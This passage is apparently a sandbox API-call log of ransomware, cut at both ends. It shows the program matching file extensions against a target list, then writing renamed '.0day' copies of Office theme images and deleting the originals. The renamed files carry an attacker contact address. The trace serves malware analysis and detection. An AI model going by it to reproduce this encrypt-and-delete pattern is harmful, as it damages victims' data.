Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.656] lstrlenW (lpString=".dbf") returned 4 [0044.656] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.656] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.656] lstrlenW (lpString=".1cd") returned 4 [0044.656] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.656] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.656] lstrlenW (lpString=".jpg") returned 4 [0044.656] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.656] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.656] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.656] lstrlenW (lpString=".doc") returned 4 [0044.656] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.656] lstrlenW (lpString=".docx") returned 5 [0044.656] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.656] lstrlenW (lpString=".pdf") returned 4 [0044.656] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.656] lstrlenW (lpString=".xls") returned 4 [0044.656] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.656] lstrlenW (lpString=".xlsx") returned 5 [0044.656] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.656] lstrlenW (lpString=".ppt") returned 4 [0044.656] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.656] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.656] lstrlenW (lpString=".zip") returned 4 [0044.656] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.656] lstrlenW (lpString=".rar") returned 4 [0044.656] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.656] lstrlenW (lpString=".bz2") returned 4 [0044.656] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.656] lstrlenW (lpString=".7z") returned 3 [0044.656] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.657] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.657] lstrlenW (lpString=".dbf") returned 4 [0044.657] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.657] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.657] lstrlenW (lpString=".1cd") returned 4 [0044.657] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.657] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.657] lstrlenW (lpString=".jpg") returned 4 [0044.657] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.657] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0044.657] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.657] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0044.657] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1287) returned 1 [0044.657] CloseHandle (hObject=0x17c) returned 1 [0044.657] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif")) returned 0x20 [0044.657] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.657] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0044.658] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.658] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.658] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0045.005] GetLastError () returned 0x0 [0045.005] ReadFile (in: hFile=0x17c, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x507, lpOverlapped=0x0) returned 1 [0045.093] WriteFile (in: hFile=0x178, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x510, lpOverlapped=0x0) returned 1 [0045.095] ReadFile (in: hFile=0x17c, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.095] WriteFile (in: hFile=0x178, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.095] SetEndOfFile (hFile=0x178) returned 1 [0045.095] CloseHandle (hObject=0x178) returned 1 [0045.095] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.095] SetEndOfFile (hFile=0x17c) returned 1 [0045.096] CloseHandle (hObject=0x17c) returned 1 [0045.096] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0045.096] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif")) returned 1 [0045.096] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.096] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.096] lstrlenW (lpString=".doc") returned 4 [0045.096] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.096] lstrlenW (lpString=".docx") returned 5 [0045.096] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.096] lstrlenW (lpString=".pdf") returned 4 [0045.096] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.097] lstrlenW (lpString=".xls") returned 4 [0045.097] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.097] lstrlenW (lpString=".xlsx") returned 5 [0045.097] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.097] lstrlenW (lpString=".ppt") returned 4 [0045.097] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.097] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.097] lstrlenW (lpString=".zip") returned 4 [0045.097] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.097] lstrlenW (lpString=".rar") returned 4 [0045.097] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.097] lstrlenW (lpString=".bz2") returned 4 [0045.097] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.097] lstrlenW (lpString=".7z") returned 3 [0045.097] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.097] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.097] lstrlenW (lpString=".dbf") returned 4 [0045.097] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.097] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.097] lstrlenW (lpString=".1cd") returned 4 [0045.097] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.097] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.097] lstrlenW (lpString=".jpg") returned 4 [0045.097] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.097] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.097] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.097] lstrlenW (lpString=".doc") returned 4 [0045.097] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.097] lstrlenW (lpString=".docx") returned 5 [0045.097] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.097] lstrlenW (lpString=".pdf") returned 4 [0045.097] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.097] lstrlenW (lpString=".xls") returned 4 [0045.097] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.097] lstrlenW (lpString=".xlsx") returned 5 [0045.098] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.098] lstrlenW (lpString=".ppt") returned 4 [0045.098] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.098] lstrlenW (lpString=".zip") returned 4 [0045.098] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.098] lstrlenW (lpString=".rar") returned 4 [0045.098] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.098] lstrlenW (lpString=".bz2") returned 4 [0045.098] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.098] lstrlenW (lpString=".7z") returned 3 [0045.098] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.098] lstrlenW (lpString=".dbf") returned 4 [0045.098] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.098] lstrlenW (lpString=".1cd") returned 4 [0045.098] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.098] lstrlenW (lpString=".jpg") returned 4 [0045.098] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.098] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0045.098] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.098] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.914] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1347) returned 1 [0045.914] CloseHandle (hObject=0x190) returned 1 [0045.914] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif")) returned 0x20 [0045.914] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.914] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.914] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.914] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.914] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0045.915] GetLastError () returned 0x0 [0045.915] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x543, lpOverlapped=0x0) returned 1 [0045.916] WriteFile (in: hFile=0x16c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x550, lpOverlapped=0x0) returned 1 [0045.917] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.917] WriteFile (in: hFile=0x16c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.917] SetEndOfFile (hFile=0x16c) returned 1 [0045.917] CloseHandle (hObject=0x16c) returned 1 [0045.917] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.917] SetEndOfFile (hFile=0x190) returned 1 [0045.918] CloseHandle (hObject=0x190) returned 1 [0045.918] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0045.918] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif")) returned 1 [0045.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.919] lstrlenW (lpString=".doc") returned 4 [0045.919] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.919] lstrlenW (lpString=".docx") returned 5 [0045.919] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.919] lstrlenW (lpString=".pdf") returned 4 [0045.919] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.919] lstrlenW (lpString=".xls") returned 4 [0045.919] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.919] lstrlenW (lpString=".xlsx") returned 5 [0045.919] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.919] lstrlenW (lpString=".ppt") returned 4 [0045.919] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.919] lstrlenW (lpString=".zip") returned 4 [0045.919] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.919] lstrlenW (lpString=".rar") returned 4 [0045.919] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.919] lstrlenW (lpString=".bz2") returned 4 [0045.919] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.919] lstrlenW (lpString=".7z") returned 3 [0045.919] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.919] lstrlenW (lpString=".dbf") returned 4 [0045.919] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.919] lstrlenW (lpString=".1cd") returned 4 [0045.919] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.919] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.920] lstrlenW (lpString=".jpg") returned 4 [0045.920] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.920] lstrlenW (lpString=".doc") returned 4 [0045.920] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.920] lstrlenW (lpString=".docx") returned 5 [0045.920] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.920] lstrlenW (lpString=".pdf") returned 4 [0045.920] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.920] lstrlenW (lpString=".xls") returned 4 [0045.920] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.920] lstrlenW (lpString=".xlsx") returned 5 [0045.920] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.920] lstrlenW (lpString=".ppt") returned 4 [0045.920] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.920] lstrlenW (lpString=".zip") returned 4 [0045.920] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.920] lstrlenW (lpString=".rar") returned 4 [0045.920] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.920] lstrlenW (lpString=".bz2") returned 4 [0045.920] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.920] lstrlenW (lpString=".7z") returned 3 [0045.920] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.920] lstrlenW (lpString=".dbf") returned 4 [0045.920] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.920] lstrlenW (lpString=".1cd") returned 4 [0045.920] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.920] lstrlenW (lpString=".jpg") returned 4 [0045.920] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.921] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0045.921] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.921] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.921] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=2552) returned 1 [0045.921] CloseHandle (hObject=0x190) returned 1 [0045.921] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif")) returned 0x20 [0045.921] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.921] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.921] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.921] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.922] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0045.923] GetLastError () returned 0x0 [0045.923] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x9f8, lpOverlapped=0x0) returned 1 [0045.924] WriteFile (in: hFile=0x16c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xa00, lpOverlapped=0x0) returned 1 [0045.925] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.926] WriteFile (in: hFile=0x16c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.926] SetEndOfFile (hFile=0x16c) returned 1 [0045.926] CloseHandle (hObject=0x16c) returned 1 [0045.926] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.926] SetEndOfFile (hFile=0x190) returned 1 [0045.927] CloseHandle (hObject=0x190) returned 1 [0045.927] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0045.927] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif")) returned 1 [0045.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.927] lstrlenW (lpString=".doc") returned 4 [0045.927] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.927] lstrlenW (lpString=".docx") returned 5 [0045.927] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.927] lstrlenW (lpString=".pdf") returned 4 [0045.927] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.927] lstrlenW (lpString=".xls") returned 4 [0045.927] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.927] lstrlenW (lpString=".xlsx") returned 5 [0045.927] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.927] lstrlenW (lpString=".ppt") returned 4 [0045.927] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.927] lstrlenW (lpString=".zip") returned 4 [0045.928] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.928] lstrlenW (lpString=".rar") returned 4 [0045.928] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.928] lstrlenW (lpString=".bz2") returned 4 [0045.928] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.928] lstrlenW (lpString=".7z") returned 3 [0045.928] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0045.928] lstrlenW (lpString=".dbf") returned 4 [0045.928] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 